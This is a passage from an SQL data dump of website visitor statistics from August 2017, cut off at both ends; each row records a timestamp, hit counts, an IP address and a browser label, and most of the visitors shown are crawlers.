1,1,0,0,'51.255.65.14','other'),(148030,1503355423,2,2,0,0,'216.244.66.246','other'),(148031,1503355528,1,1,0,0,'51.255.65.64','other'),(148032,1503356075,1,1,0,0,'40.77.167.44','other'),(148033,1503356233,1,1,0,0,'217.182.132.241','other'),(148034,1503356523,1,1,0,0,'91.209.11.236','other'),(148035,1503356646,1,1,0,0,'164.132.162.157','other'),(148036,1503356762,1,1,0,0,'217.182.132.6','other'),(148037,1503356949,1,1,0,0,'141.8.142.21','other'),(148038,1503357296,1,0,1,0,'66.249.76.93',''),(148039,1503357482,1,1,0,0,'141.8.183.5','other'),(148040,1503357688,1,1,0,0,'217.182.132.181','other'),(148041,1503357892,1,1,0,0,'51.255.65.89','other'),(148042,1503358697,1,1,0,0,'51.255.71.123','other'),(148043,1503358784,1,1,0,0,'217.182.132.97','other'),(148044,1503359334,1,1,0,0,'141.8.142.21','other'),(148045,1503359546,7,7,0,0,'216.244.66.194','other'),(148046,1503359787,1,1,0,0,'141.8.142.45','other'),(148047,1503359849,1,1,0,0,'91.209.11.236','other'),(148048,1503360114,1,1,0,0,'213.180.203.32','other'),(148049,1503360826,1,1,0,0,'141.8.142.21','other'),(148050,1503361316,1,1,0,0,'137.74.207.102','other'),(148051,1503361462,1,1,0,0,'51.255.65.54','other'),(148052,1503361557,1,1,0,0,'5.45.207.32','other'),(148053,1503361599,1,0,1,0,'68.180.228.221',''),(148054,1503362156,1,1,0,0,'141.8.142.107','other'),(148055,1503362196,1,1,0,0,'51.255.65.38','other'),(148056,1503362505,3,3,0,0,'213.180.203.32','other'),(148057,1503362711,1,1,0,0,'216.244.66.246','other'),(148058,1503363178,1,1,0,0,'141.8.183.5','other'),(148059,1503363925,1,1,0,0,'95.108.181.63','other'),(148060,1503364193,1,1,0,0,'37.9.113.163','other'),(148061,1503364361,1,1,0,0,'5.45.207.32','other'),(148062,1503364437,1,1,0,0,'95.108.181.69','other'),(148063,1503365168,1,1,0,0,'8.29.198.27','other'),(148064,1503365254,1,0,1,0,'68.180.228.221',''),(148065,1503365524,1,1,0,0,'217.182.132.82','other'),(148066,1503365671,2,2,0,0,'216.244.66.246','other'),(148067,1503366259,1,1,0,0,'37.9.113.195','other'),(148068,1503366564,1,1,0,0,'217.182.132.58','other'),(148069,1503366809,1,0,1,0,'68.180.228.221',''),(148070,1503367010,1,1,0,0,'217.182.132.35','other'),(148071,1503367228,1,1,0,0,'51.255.65.40','other'),(148072,1503367296,1,1,0,0,'51.255.65.60','other'),(148073,1503367326,1,1,0,0,'178.154.200.27','other'),(148074,1503368056,1,1,0,0,'141.8.183.1','other'),(148075,1503368309,1,1,0,0,'91.209.11.236','other'),(148076,1503369097,1,1,0,0,'217.182.132.63','other'),(148077,1503369766,1,1,0,0,'95.108.181.58','other'),(148078,1503369810,1,1,0,0,'40.77.167.29','other'),(148079,1503369824,1,1,0,0,'37.9.113.180','other'),(148080,1503369874,1,1,0,0,'141.8.142.21','other'),(148081,1503369948,1,1,0,0,'217.69.133.203','other'),(148082,1503369950,1,1,0,0,'141.8.142.45','other'),(148083,1503370126,1,0,1,0,'66.249.76.89',''),(148084,1503370294,1,0,1,0,'66.249.76.91',''),(148085,1503370684,1,1,0,0,'66.249.66.74','chrome'),(148086,1503370865,1,1,0,0,'66.249.76.89','chrome'),(148087,1503371926,1,1,0,0,'141.8.183.5','other'),(148088,1503372315,1,1,0,0,'137.74.201.99','other'),(148089,1503372796,1,1,0,0,'137.74.203.194','other'),(148090,1503373879,1,1,0,0,'137.74.201.100','other'),(148091,1503374098,1,1,0,0,'137.74.207.114','other'),(148092,1503374234,7,7,0,0,'216.244.66.246','other'),(148093,1503374508,1,1,0,0,'141.8.183.5','other'),(148094,1503374558,1,1,0,0,'141.8.142.21','other'),(148095,1503374748,1,1,0,0,'5.45.207.64','other'),(148096,1503374803,1,1,0,0,'95.108.181.63','other'),(148097,1503374922,1,1,0,0,'51.255.71.117','other'),(148098,1503375014,1,1,0,0,'5.45.207.32','other'),(148099,1503375129,1,1,0,0,'95.108.181.69','other'),(148100,1503375314,1,1,0,0,'217.69.133.218','other'),(148101,1503375336,1,1,0,0,'216.244.66.194','other'),(148102,1503375387,1,1,0,0,'217.69.133.2','other'),(148103,1503375610,1,1,0,0,'40.77.167.29','other'),(148104,1503375745,1,1,0,0,'217.182.132.86','other'),(148105,1503376003,1,1,0,0,'8.29.198.26','other'),(148106,1503376059,1,1,0,0,'137.74.207.188','other'),(148107,1503376248,1,0,1,0,'68.180.228.221',''),(148108,1503376681,1,1,0,0,'37.9.113.144','other'),(148109,1503376734,1,1,0,0,'37.9.113.54','other'),(148110,1503376771,1,1,0,0,'178.154.171.78','other'),(148111,1503376795,1,1,0,0,'178.154.200.35','other'),(148112,1503376817,1,1,0,0,'95.108.213.1','other'),(148113,1503376946,1,1,0,0,'91.196.178.71','firefox'),(148114,1503376950,1,1,0,0,'51.255.65.85','other'),(148115,1503377430,1,1,0,0,'40.77.167.44','other'),(148116,1503377940,1,1,0,0,'180.76.15.28','other'),(148117,1503378382,1,1,0,0,'164.132.162.160','other'),(148118,1503378461,2,2,0,0,'40.77.167.44','other'),(148119,1503378742,1,1,0,0,'51.255.65.32','other'),(148120,1503378866,1,1,0,0,'180.76.15.135','other'),(148121,1503379049,1,1,0,0,'51.255.71.126','other'),(148122,1503379470,1,1,0,0,'51.255.65.48','other'),(148123,1503379601,1,1,0,0,'137.74.207.170','other'),(148124,1503379727,1,1,0,0,'217.182.132.91','other'),(148125,1503379867,1,1,0,0,'178.95.54.151','firefox'),(148126,1503379876,1,1,0,0,'217.182.132.81','other'),(148127,1503380031,1,1,0,0,'51.255.71.125','other'),(148128,1503380377,7,7,0,0,'216.244.66.194','other'),(148129,1503380381,1,1,0,0,'213.174.29.35','chrome'),(148130,1503380421,1,1,0,0,'91.196.178.72','firefox'),(148131,1503380827,1,1,0,0,'217.69.133.3','other'),(148132,1503381142,1,1,0,0,'217.182.132.36','other'),(148133,1503381501,1,1,0,0,'40.77.167.29','other'),(148134,1503381790,1,1,0,0,'95.108.181.63','other'),(148135,1503381984,1,1,0,0,'51.255.65.66','other'),(148136,1503382286,1,1,0,0,'81.14.225.87','chrome'),(148137,1503382648,1,1,0,0,'141.8.183.1','other'),(148138,1503382846,1,1,0,0,'66.249.76.109','chrome'),(148139,1503383048,1,1,0,0,'95.108.181.63','other'),(148140,1503383262,1,1,0,0,'178.154.200.27','other'),(148141,1503383799,1,1,0,0,'40.77.167.29','other'),(148142,1503383935,1,1,0,0,'178.92.253.205','chrome'),(148143,1503384426,1,1,0,0,'51.255.71.110','other'),(148144,1503384448,1,1,0,0,'46.185.115.80','firefox'),(148145,1503384488,2,2,0,0,'216.244.66.246','other'),(148146,1503384538,1,1,0,0,'141.8.183.5','other'),(148147,1503384658,1,1,0,0,'141.8.142.45','other'),(148148,1503384947,1,1,0,0,'91.209.11.236','other'),(148149,1503385033,1,1,0,0,'51.255.65.94','other'),(148150,1503385205,1,1,0,0,'217.182.132.175','other'),(148151,1503385275,1,1,0,0,'94.178.6.147','chrome'),(148152,1503385612,1,1,0,0,'137.74.207.164','other'),(148153,1503385638,1,0,1,0,'68.180.228.221',''),(148154,1503386252,1,1,0,0,'217.69.133.5','other'),(148155,1503386751,1,1,0,0,'37.144.77.145','chrome'),(148156,1503386765,86,86,0,0,'173.212.247.207','other'),(148157,1503386841,1,1,0,0,'8.29.198.27','other'),(148158,1503387538,1,1,0,0,'91.196.178.98','chrome'),(148159,1503387804,1,1,0,0,'107.21.1.8','other'),(148160,1503388551,1,1,0,0,'94.178.6.147','chrome'),(148161,1503388827,5,5,0,0,'216.244.66.194','other'),(148162,1503389089,1,1,0,0,'217.182.132.72','other'),(148163,1503389137,1,1,0,0,'91.196.177.46','firefox'),(148164,1503389788,1,1,0,0,'94.178.6.147','chrome'),(148165,1503390017,1,1,0,0,'137.74.201.100','other'),(148166,1503390633,1,1,0,0,'51.255.65.53','other'),(148167,1503390760,1,1,0,0,'91.209.11.236','other'),(148168,1503390833,1,1,0,0,'94.178.6.147','chrome'),(148169,1503391392,1,1,0,0,'51.255.65.78','other'),(148170,1503391657,1,1,0,0,'91.196.178.98','chrome'),(148171,1503391689,1,1,0,0,'217.69.133.6','other'),(148172,1503392314,1,1,0,0,'213.180.203.32','other'),(148173,1503392349,1,1,0,0,'5.45.207.78','other'),(148174,1503392399,1,1,0,0,'178.154.171.78','other'),(148175,1503392583,1,1,0,0,'37.53.225.235','firefox'),(148176,1503392774,3,3,0,0,'216.244.66.246','other'),(148177,1503393015,1,1,0,0,'91.196.178.69','chrome'),(148178,1503393157,1,1,0,0,'51.255.65.88','other'),(148179,1503393233,2,2,0,0,'178.154.200.7','other'),(148180,1503393599,1,1,0,0,'213.180.203.32','other'),(148181,1503393977,1,1,0,0,'5.45.207.32','other'),(148182,1503394423,1,1,0,0,'217.182.132.34','other'),(148183,1503394655,8,8,0,0,'216.244.66.246','other'),(148184,1503394710,2,2,0,0,'178.154.171.77','other'),(148185,1503394772,2,2,0,0,'37.9.113.54','other'),(148186,1503394822,6,6,0,0,'87.250.224.74','other'),(148187,1503394934,1,1,0,0,'157.55.39.4','other'),(148188,1503395011,1,1,0,0,'178.154.171.78','other'),(148189,1503395492,1,1,0,0,'51.255.65.71','other'),(148190,1503396179,1,1,0,0,'51.255.65.10','other'),(148191,1503396560,1,1,0,0,'37.55.212.236','chrome'),(148192,1503396843,1,1,0,0,'217.182.132.148','other'),(148193,1503396947,1,1,0,0,'51.255.71.112','other'),(148194,1503397133,7,7,0,0,'216.244.66.194','other'),(148195,1503397169,1,1,0,0,'217.69.133.9','other'),(148196,1503397245,1,1,0,0,'51.255.71.122','other'),(148197,1503397671,1,1,0,0,'8.29.198.26','other'),(148198,1503398375,1,1,0,0,'217.182.132.155','other'),(148199,1503398687,1,1,0,0,'51.255.65.17','other'),(148200,1503398799,1,1,0,0,'37.9.113.94','other'),(148201,1503398801,1,1,0,0,'40.77.167.109','other'),(148202,1503399060,4,4,0,0,'216.244.66.194','other'),(148203,1503399224,1,1,0,0,'164.132.162.188','other'),(148204,1503399421,1,1,0,0,'91.209.11.236','other'),(148205,1503399639,1,1,0,0,'51.255.65.89','other'),(148206,1503400637,1,1,0,0,'217.182.132.87','other'),(148207,1503400786,1,1,0,0,'91.209.11.236','other'),(148208,1503401014,1,1,0,0,'51.255.65.38','other'),(148209,1503401016,2,2,0,0,'80.240.128.62','chrome'),(148210,1503401432,1,1,0,0,'178.154.200.7','other'),(148211,1503401554,1,1,0,0,'51.255.65.54','other'),(148212,1503401621,1,1,0,0,'91.196.178.66','chrome'),(148213,1503401643,1,1,0,0,'217.182.132.30','other'),(148214,1503401917,1,1,0,0,'217.182.132.187','other'),(148215,1503402050,1,1,0,0,'217.182.132.34','other'),(148216,1503402229,1,1,0,0,'95.108.181.69','other'),(148217,1503402428,1,1,0,0,'91.196.178.165','chrome'),(148218,1503402688,1,1,0,0,'217.182.132.21','other'),(148219,1503402816,1,1,0,0,'40.77.167.44','other'),(148220,1503402961,1,1,0,0,'216.244.66.246','other'),(148221,1503403178,1,1,0,0,'51.255.71.116','other'),(148222,1503403202,1,1,0,0,'94.178.6.147','chrome'),(148223,1503403413,1,1,0,0,'217.182.132.62','other'),(148224,1503403571,1,1,0,0,'217.182.132.152','other'),(148225,1503403712,1,1,0,0,'5.45.207.57','other'),(148226,1503403716,1,1,0,0,'37.9.113.94','other'),(148227,1503404528,1,1,0,0,'141.8.142.107','other'),(148228,1503404581,1,1,0,0,'91.209.11.236','other'),(148229,1503404649,1,1,0,0,'164.132.162.188','other'),(148230,1503404993,1,1,0,0,'51.255.65.31','other'),(148231,1503405368,1,1,0,0,'5.45.207.26','other'),(148232,1503405389,1,1,0,0,'141.8.142.45','other'),(148233,1503405825,1,1,0,0,'51.255.65.72','other'),(148234,1503405866,1,1,0,0,'217.182.132.32','other'),(148235,1503406098,1,1,0,0,'141.8.183.1','other'),(148236,1503406321,1,1,0,0,'51.255.65.2','other'),(148237,1503406824,1,1,0,0,'93.171.243.86','chrome'),(148238,1503407247,1,1,0,0,'217.182.132.16','other'),(148239,1503407445,1,1,0,0,'141.8.183.19','other'),(148240,1503407706,1,1,0,0,'138.68.128.28','chrome'),(148241,1503407790,1,1,0,0,'87.250.224.54','other'),(148242,1503407803,1,1,0,0,'95.108.181.69','other'),(148243,1503407943,1,1,0,0,'37.9.113.78','other'),(148244,1503408502,1,1,0,0,'8.29.198.27','other'),(148245,1503408585,1,1,0,0,'157.55.39.90','other'),(148246,1503408846,1,1,0,0,'95.133.55.81','chrome'),(148247,1503408873,1,1,0,0,'37.9.113.180','other'),(148248,1503409058,1,1,0,0,'51.255.65.50','other'),(148249,1503409126,1,1,0,0,'37.9.113.163','other'),(148250,1503409139,4,4,0,0,'216.244.66.194','other'),(148251,1503409438,1,1,0,0,'141.8.183.1','other'),(148252,1503409926,1,1,0,0,'141.8.142.107','other'),(148253,1503409930,1,1,0,0,'95.108.181.63','other'),(148254,1503410266,1,1,0,0,'37.9.113.138','other'),(148255,1503410643,1,1,0,0,'157.55.39.145','other'),(148256,1503410695,1,1,0,0,'5.45.207.26','other'),(148257,1503410757,1,1,0,0,'217.182.132.7','other'),(148258,1503410813,1,1,0,0,'141.8.142.21','other'),(148259,1503410896,4,4,0,0,'141.8.183.1','other'),(148260,1503410955,1,1,0,0,'137.74.201.108','other'),(148261,1503411031,1,1,0,0,'5.255.253.2','other'),(148262,1503411042,1,1,0,0,'217.182.132.149','other'),(148263,1503411334,1,1,0,0,'195.69.221.54','chrome'),(148264,1503411364,1,1,0,0,'87.250.224.75','other'),(148265,1503411380,1,1,0,0,'217.182.132.67','other'),(148266,1503411497,1,1,0,0,'217.182.132.65','other'),(148267,1503411788,1,1,0,0,'91.196.178.66','chrome'),(148268,1503412100,1,1,0,0,'5.255.253.4','other'),(148269,1503412271,1,1,0,0,'141.8.142.45','other'),(148270,1503412339,1,1,0,0,'5.45.207.56','other'),(148271,1503412396,1,1,0,0,'88.198.19.164','other'),(148272,1503412647,1,0,1,0,'66.249.76.107',''),(148273,1503412662,1,0,1,0,'66.249.66.155',''),(148274,1503412751,1,1,0,0,'51.255.65.76','other'),(148275,1503412783,2,2,0,0,'217.182.132.68','other'),(148276,1503412793,1,1,0,0,'51.255.65.2','other'),(148277,1503413059,1,1,0,0,'5.45.207.64','other'),(148278,1503413075,2,2,0,0,'5.45.207.32','other'),(148279,1503413155,1,1,0,0,'199.58.86.209','other'),(148280,1503413388,1,1,0,0,'141.8.183.1','other'),(148281,1503413404,1,1,0,0,'141.8.142.21','other'),(148282,1503413467,1,1,0,0,'217.182.132.19','other'),(148283,1503413523,3,3,0,0,'216.244.66.246','other'),(148284,1503413625,1,0,1,0,'66.249.66.76',''),(148285,1503413707,29,0,29,0,'68.180.228.221',''),(148286,1503413797,1,1,0,0,'178.154.200.7','other'),(148287,1503413823,2,2,0,0,'95.108.181.63','other'),(148288,1503413949,1,1,0,0,'141.8.183.5','other'),(148289,1503414152,1,1,0,0,'141.8.142.56','other'),(148290,1503414179,1,1,0,0,'217.182.132.92','other'),(148291,1503414561,1,1,0,0,'178.154.200.27','other'),(148292,1503414564,1,1,0,0,'37.9.113.94','other'),(148293,1503414612,5,0,5,0,'68.180.228.221',''),(148294,1503414648,2,2,0,0,'141.8.142.45','other'),(148295,1503414848,1,1,0,0,'51.255.64.106','other'),(148296,1503414887,1,1,0,0,'141.8.142.83','other'),(148297,1503414919,1,1,0,0,'141.8.142.107','other'),(148298,1503415082,4,4,0,0,'213.180.203.32','other'),(148299,1503415179,1,1,0,0,'95.108.181.69','other'),(148300,1503415205,2,2,0,0,'37.9.113.180','other'),(148301,1503415222,1,1,0,0,'217.182.132.192','other'),(148302,1503415274,1,1,0,0,'95.108.181.58','other'),(148303,1503415297,5,5,0,0,'95.108.181.63','other'),(148304,1503415314,1,1,0,0,'5.255.253.29','other'),(148305,1503415403,3,3,0,0,'141.8.183.5','other'),(148306,1503415495,2,2,0,0,'5.45.207.64','other'),(148307,1503415557,2,2,0,0,'141.8.183.1','other'),(148308,1503415588,1,1,0,0,'178.154.200.27','other'),(148309,1503415591,1,1,0,0,'37.9.113.94','other'),(148310,1503415671,1,1,0,0,'51.255.65.76','other'),(148311,1503415686,1,0,1,0,'68.180.228.221',''),(148312,1503415800,1,1,0,0,'37.9.113.163','other'),(148313,1503415802,1,1,0,0,'87.250.224.80','other'),(148314,1503415820,1,1,0,0,'5.45.207.32','other'),(148315,1503415856,1,1,0,0,'141.8.142.45','other'),(148316,1503415872,1,1,0,0,'5.255.253.4','other'),(148317,1503415929,1,1,0,0,'87.250.224.54','other'),(148318,1503415947,1,1,0,0,'5.45.207.15','other'),(148319,1503416040,1,1,0,0,'178.154.200.7','other'),(148320,1503416560,1,1,0,0,'212.33.255.53','other'),(148321,1503416561,1,1,0,0,'212.33.255.53','msie'),(148322,1503416683,1,1,0,0,'141.8.142.107','other'),(148323,1503416717,1,1,0,0,'158.69.225.36','other'),(148324,1503416740,1,1,0,0,'158.69.225.36','chrome'),(148325,1503417002,1,1,0,0,'213.180.203.32','other'),(148326,1503417230,1,1,0,0,'157.55.39.145','other'),(148327,1503417427,6,6,0,0,'216.244.66.194','other'),(148328,1503418170,1,1,0,0,'141.8.183.5','other'),(148329,1503418395,1,1,0,0,'217.182.132.50','other'),(148330,1503418505,1,1,0,0,'51.255.71.98','other'),(148331,1503418771,1,1,0,0,'87.250.224.54','other'),(148332,1503418801,1,1,0,0,'178.154.200.7','other'),(148333,1503418836,1,1,0,0,'217.182.132.178','other'),(148334,1503418924,2,2,0,0,'141.8.142.107','other'),(148335,1503419033,1,1,0,0,'51.255.65.40','other'),(148336,1503419197,1,1,0,0,'91.196.178.163','chrome'),(148337,1503419336,1,1,0,0,'8.29.198.26','other'),(148338,1503419905,1,1,0,0,'141.8.142.21','other'),(148339,1503420068,2,2,0,0,'141.8.183.1','other'),(148340,1503420233,2,2,0,0,'95.108.181.63','other'),(148341,1503420451,1,1,0,0,'5.45.207.64','other'),(148342,1503420513,1,1,0,0,'37.53.122.107','chrome'),(148343,1503420681,1,1,0,0,'217.182.132.183','other'),(148344,1503421138,1,1,0,0,'217.182.132.30','other'),(148345,1503421471,1,1,0,0,'40.77.167.109','other'),(148346,1503421763,1,1,0,0,'51.255.71.118','other'),(148347,1503422395,1,1,0,0,'66.102.9.25','chrome'),(148348,1503422899,5,5,0,0,'216.244.66.246','other'),(148349,1503422949,2,2,0,0,'95.108.181.69','other'),(148350,1503422979,1,1,0,0,'5.45.207.64','other'),(148351,1503423189,1,1,0,0,'217.182.132.7','other'),(148352,1503423202,1,1,0,0,'178.154.200.7','other'),(148353,1503423222,1,1,0,0,'141.8.142.21','other'),(148354,1503423282,1,1,0,0,'213.180.203.32','other'),(148355,1503423396,1,1,0,0,'91.196.178.165','chrome'),(148356,1503423889,1,1,0,0,'217.182.132.4','other'),(148357,1503424120,1,1,0,0,'37.9.113.163','other'),(148358,1503424232,1,1,0,0,'37.9.113.138','other'),(148359,1503424236,1,1,0,0,'37.9.113.180','other'),(148360,1503424585,1,1,0,0,'137.74.207.120','other'),(148361,1503424586,1,1,0,0,'51.255.65.86','other'),(148362,1503425208,1,1,0,0,'46.161.9.39','chrome'),(148363,1503425358,1,1,0,0,'51.255.65.25','other'),(148364,1503425876,1,1,0,0,'95.108.181.69','other'),(148365,1503426015,1,1,0,0,'217.182.132.59','other'),(148366,1503426748,1,1,0,0,'217.182.132.182','other'),(148367,1503427013,1,1,0,0,'95.108.181.69','other'),(148368,1503427063,2,2,0,0,'141.8.142.45','other'),(148369,1503427103,1,1,0,0,'37.9.113.138','other'),(148370,1503427154,1,1,0,0,'141.8.183.1','other'),(148371,1503427240,1,1,0,0,'217.182.132.151','other'),(148372,1503427323,1,1,0,0,'217.182.132.54','other'),(148373,1503427615,1,1,0,0,'107.167.105.132','other'),(148374,1503427852,1,0,1,0,'68.180.228.221',''),(148375,1503427981,1,1,0,0,'51.255.71.98','other'),(148376,1503428305,1,1,0,0,'216.244.66.194','other'),(148377,1503428401,1,1,0,0,'217.69.133.218','other'),(148378,1503428887,1,1,0,0,'216.244.66.246','other'),(148379,1503429160,1,1,0,0,'217.182.132.148','other'),(148380,1503429203,2,2,0,0,'51.255.65.72','other'),(148381,1503429442,3,0,3,0,'68.180.228.221',''),(148382,1503429557,1,1,0,0,'51.255.65.97','other'),(148383,1503429669,1,1,0,0,'51.255.65.85','other'),(148384,1503429717,1,1,0,0,'51.255.71.110','other'),(148385,1503430005,1,1,0,0,'5.45.207.32','other'),(148386,1503430012,6,6,0,0,'216.244.66.246','other'),(148387,1503430035,1,1,0,0,'185.105.116.95','firefox'),(148388,1503430161,1,1,0,0,'8.29.198.25','other'),(148389,1503431743,1,1,0,0,'51.255.65.92','other'),(148390,1503432319,1,1,0,0,'51.255.65.97','other'),(148391,1503432489,1,1,0,0,'217.182.132.97','other'),(148392,1503432678,1,1,0,0,'91.209.11.236','other'),(148393,1503432813,1,1,0,0,'51.255.65.63','other'),(148394,1503432827,1,1,0,0,'37.9.113.195','other'),(148395,1503433038,1,1,0,0,'178.154.200.7','other'),(148396,1503433479,1,1,0,0,'51.255.65.95','other'),(148397,1503433485,1,1,0,0,'51.255.65.4','other'),(148398,1503433694,1,1,0,0,'40.77.167.44','other'),(148399,1503434012,1,1,0,0,'5.45.207.64','other'),(148400,1503434164,1,1,0,0,'178.154.200.7','other'),(148401,1503434183,1,1,0,0,'37.9.113.78','other'),(148402,1503434188,1,1,0,0,'5.45.207.66','other'),(148403,1503434191,1,1,0,0,'213.180.203.32','other'),(148404,1503434246,1,1,0,0,'141.8.183.5','other'),(148405,1503434357,1,1,0,0,'151.80.27.118','other'),(148406,1503434417,1,1,0,0,'217.182.132.157','other'),(148407,1503436291,1,1,0,0,'51.255.65.65','other'),(148408,1503436345,1,1,0,0,'180.76.15.14','other'),(148409,1503436409,1,1,0,0,'46.201.23.193','chrome'),(148410,1503436591,1,1,0,0,'213.180.203.32','other'),(148411,1503437655,1,1,0,0,'178.92.158.54','chrome'),(148412,1503438635,1,1,0,0,'91.196.178.38','chrome'),(148413,1503438819,3,3,0,0,'216.244.66.194','other'),(148414,1503439337,1,1,0,0,'5.45.207.32','other'),(148415,1503439505,1,1,0,0,'66.249.66.156','chrome'),(148416,1503439777,1,0,1,0,'66.249.76.109',''),(148417,1503439986,1,1,0,0,'141.8.142.107','other'),(148418,1503440038,1,1,0,0,'178.154.200.7','other'),(148419,1503440157,1,1,0,0,'141.8.142.21','other'),(148420,1503440472,1,1,0,0,'5.45.207.32','other'),(148421,1503440996,1,1,0,0,'8.29.198.26','other'),(148422,1503441131,7,7,0,0,'216.244.66.246','other'),(148423,1503441675,1,1,0,0,'217.182.132.67','other'),(148424,1503441990,1,1,0,0,'51.255.71.98','other'),(148425,1503443808,1,1,0,0,'216.244.66.246','other'),(148426,1503443949,1,1,0,0,'51.255.65.69','other'),(148427,1503443990,1,1,0,0,'5.45.207.15','other'),(148428,1503443998,1,1,0,0,'141.8.142.107','other'),(148429,1503444157,1,1,0,0,'192.99.203.35','other'),(148430,1503444337,1,1,0,0,'51.255.65.16','other'),(148431,1503445138,2,2,0,0,'141.8.183.5','other'),(148432,1503445466,2,2,0,0,'5.45.207.64','other'),(148433,1503445522,2,2,0,0,'95.108.181.69','other'),(148434,1503445534,2,2,0,0,'141.8.183.1','other'),(148435,1503445629,2,2,0,0,'178.154.200.7','other'),(148436,1503445707,2,2,0,0,'141.8.142.107','other'),(148437,1503445945,3,3,0,0,'216.244.66.194','other'),(148438,1503446086,3,3,0,0,'141.8.183.5','other'),(148439,1503446432,1,1,0,0,'66.249.66.74','chrome'),(148440,1503446456,1,1,0,0,'141.8.142.45','other'),(148441,1503446549,3,3,0,0,'216.244.66.246','other'),(148442,1503446558,1,1,0,0,'217.182.132.151','other'),(148443,1503447138,2,2,0,0,'51.255.71.122','other'),(148444,1503447632,1,1,0,0,'51.255.65.82','other'),(148445,1503447794,1,0,1,0,'68.180.228.221',''),(148446,1503448232,1,1,0,0,'164.132.162.187','other'),(148447,1503448441,1,1,0,0,'164.132.162.160','other'),(148448,1503448598,1,1,0,0,'51.255.65.24','other'),(148449,1503449301,1,1,0,0,'207.46.13.4','other'),(148450,1503450348,1,1,0,0,'141.8.183.1','other'),(148451,1503450437,1,1,0,0,'51.255.71.113','other'),(148452,1503450665,1,1,0,0,'217.182.132.79','other'),(148453,1503450780,1,1,0,0,'164.132.162.154','other'),(148454,1503450872,2,0,2,0,'68.180.228.221',''),(148455,1503451747,1,1,0,0,'217.182.132.15','other'),(148456,1503451823,1,1,0,0,'8.29.198.27','other'),(148457,1503451957,3,3,0,0,'216.244.66.246','other'),(148458,1503451969,1,0,1,0,'68.180.228.221',''),(148459,1503452044,1,0,1,0,'66.249.76.89',''),(148460,1503452119,1,1,0,0,'141.8.142.21','other'),(148461,1503452474,1,1,0,0,'217.182.132.173','other'),(148462,1503452542,2,2,0,0,'173.208.157.186','other'),(148463,1503452935,1,1,0,0,'157.55.39.90','other'),(148464,1503453130,6,6,0,0,'216.244.66.194','other'),(148465,1503453223,1,1,0,0,'87.250.224.54','other'),(148466,1503453523,1,1,0,0,'217.182.132.157','other'),(148467,1503453584,1,1,0,0,'51.255.65.60','other'),(148468,1503453903,1,1,0,0,'66.249.66.156','chrome'),(148469,1503454015,1,1,0,0,'51.255.71.98','other'),(148470,1503454067,1,1,0,0,'217.182.132.52','other'),(148471,1503454098,1,1,0,0,'217.182.132.91','other'),(148472,1503454644,1,1,0,0,'157.55.39.90','other'),(148473,1503455169,1,1,0,0,'217.182.132.187','other'),(148474,1503455736,1,1,0,0,'141.8.142.107','other'),(148475,1503456019,1,1,0,0,'217.182.132.63','other'),(148476,1503456474,2,2,0,0,'216.244.66.246','other'),(148477,1503456713,1,1,0,0,'213.180.203.32','other'),(148478,1503457697,1,1,0,0,'37.9.113.94','other'),(148479,1503457871,1,1,0,0,'51.255.65.40','other'),(148480,1503458157,1,1,0,0,'51.255.65.93','other'),(148481,1503458251,1,1,0,0,'141.8.142.21','other'),(148482,1503458317,1,1,0,0,'141.8.183.1','other'),(148483,1503458470,1,1,0,0,'51.255.65.32','other'),(148484,1503458682,1,1,0,0,'51.255.65.31','other'),(148485,1503459113,1,1,0,0,'213.180.203.32','other'),(148486,1503459349,1,1,0,0,'178.154.200.7','other'),(148487,1503459574,1,1,0,0,'51.255.65.38','other'),(148488,1503459653,1,1,0,0,'51.255.71.122','other'),(148489,1503460133,1,0,1,0,'66.249.76.89',''),(148490,1503460211,1,1,0,0,'141.8.183.5','other'),(148491,1503460745,6,6,0,0,'216.244.66.246','other'),(148492,1503461406,1,0,1,0,'66.249.76.107',''),(148493,1503461792,1,0,1,0,'68.180.228.221',''),(148494,1503462255,5,5,0,0,'216.244.66.194','other'),(148495,1503462661,1,1,0,0,'8.29.198.27','other'),(148496,1503462688,2,2,0,0,'5.45.207.64','other'),(148497,1503463316,1,1,0,0,'207.46.13.4','other'),(148498,1503463751,1,1,0,0,'91.196.178.72','firefox'),(148499,1503464121,1,1,0,0,'178.140.12.112','msie'),(148500,1503464124,1,1,0,0,'95.24.22.177','msie'),(148501,1503464211,1,1,0,0,'91.209.11.236','other'),(148502,1503464611,4,4,0,0,'216.244.66.194','other'),(148503,1503464836,1,1,0,0,'180.76.15.156','other'),(148504,1503465233,1,1,0,0,'216.244.66.246','other'),(148505,1503465319,1,1,0,0,'141.8.142.107','other'),(148506,1503465657,1,0,1,0,'66.249.76.91',''),(148507,1503465662,1,1,0,0,'178.93.235.201','chrome'),(148508,1503466039,1,1,0,0,'91.196.178.65','firefox'),(148509,1503466335,1,0,1,0,'66.249.66.76',''),(148510,1503466786,1,1,0,0,'91.196.178.167','firefox'),(148511,1503467127,1,0,1,0,'68.180.228.221',''),(148512,1503467280,1,1,0,0,'91.209.11.236','other'),(148513,1503467463,1,1,0,0,'40.77.167.109','other'),(148514,1503467650,4,4,0,0,'216.244.66.246','other'),(148515,1503468184,1,1,0,0,'5.45.207.32','other'),(148516,1503468465,1,1,0,0,'180.76.15.145','other'),(148517,1503469791,1,1,0,0,'40.77.167.44','other'),(148518,1503470055,1,1,0,0,'91.196.178.68','firefox'),(148519,1503470162,1,1,0,0,'216.244.66.246','other'),(148520,1503470711,1,1,0,0,'91.209.11.236','other'),(148521,1503470712,1,0,1,0,'68.180.228.221',''),(148522,1503471075,148,148,0,0,'108.12.37.82','other'),(148523,1503471522,1,1,0,0,'217.182.132.184','other'),(148524,1503471613,1,1,0,0,'46.185.115.80','firefox'),(148525,1503471648,1,1,0,0,'164.132.162.159','other'),(148526,1503471987,1,1,0,0,'217.182.132.93','other'),(148527,1503472165,1,1,0,0,'217.182.132.157','other'),(148528,1503472201,1,1,0,0,'141.8.183.1','other'),(148529,1503472229,1,1,0,0,'66.249.76.109','chrome'),(148530,1503472402,1,1,0,0,'194.44.61.218','chrome'),(148531,1503472730,1,0,1,0,'68.180.228.221',''),(148532,1503473135,1,0,1,0,'66.249.66.155',''),(148533,1503473141,1,1,0,0,'94.178.6.147','chrome'),(148534,1503473294,5,5,0,0,'216.244.66.194','other'),(148535,1503473311,1,1,0,0,'194.44.48.25','chrome'),(148536,1503473367,1,1,0,0,'217.182.132.29','other'),(148537,1503473487,1,1,0,0,'8.29.198.26','other'),(148538,1503475505,2,2,0,0,'213.180.203.32','other'),(148539,1503475593,1,1,0,0,'180.76.15.32','other'),(148540,1503476004,1,1,0,0,'94.178.6.147','chrome'),(148541,1503476025,1,1,0,0,'94.179.24.115','chrome'),(148542,1503476178,1,1,0,0,'213.169.67.57','chrome'),(148543,1503476753,1,1,0,0,'